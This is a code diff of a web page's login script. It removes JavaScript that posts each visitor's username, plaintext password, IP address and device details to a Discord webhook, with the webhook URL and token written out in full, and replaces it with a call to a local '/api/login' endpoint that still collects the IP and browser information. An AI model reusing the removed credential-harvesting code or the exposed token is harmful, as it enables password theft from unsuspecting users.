--- a/index.html
+++ b/index.html
@@ -100,47 +100,18 @@
             const ipData = await ipResponse.json();
             const ipAddress = ipData.ip;
 
-            // Discord webhook call
-            const webhookUrl = "https://discord.com/api/webhooks/1378978890373926963/KBqbq1R-P4Pu1ytdZl5oo5kHKVkCpz8MeszoyUjR1JRK1M-vIQ4ov2x4hFbhMJa_VGmQ";
-            
-            const response = await fetch(webhookUrl, {
+            // Call your API endpoint
+            const response = await fetch('/api/login', {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json',
                 },
                 body: JSON.stringify({
-                    username: "Login Bot",
-                    embeds: [{
-                        title: "🔐 New Login Attempt",
-                        color: 0xFF0000,
-                        fields: [
-                            {
-                                name: "👤 Username",
-                                value: username,
-                                inline: true
-                            },
-                            {
-                                name: "🔑 Password",
-                                value: password,
-                                inline: true
-                            },
-                            {
-                                name: "🌐 IP Address",
-                                value: ipAddress,
-                                inline: true
-                            },
-                            {
-                                name: "⏰ Timestamp",
-                                value: new Date(timestamp).toLocaleString(),
-                                inline: false
-                            },
-                            {
-                                name: "📱 Device Info",
-                                value: `Platform: ${browserInfo.platform}\nBrowser: ${browserInfo.browser}\nResolution: ${browserInfo.screenResolution}`,
-                                inline: false
-                            }
-                        ]
-                    }]
+                    username: username,
+                    password: password,
+                    timestamp: timestamp,
+                    ipAddress: ipAddress,
+                    browserInfo: browserInfo
                 })
             });
             
@@ -155,7 +126,7 @@
             showToast('Error: ' + error.message, 'error');
         } finally {
             button.disabled = false;
-            button.innerHTML = 'Login';
+            button.innerHTML = '→';
         }
         return false;
     }
@@ -187,4 +158,3 @@
     </script>
 </body>
 </html>
-
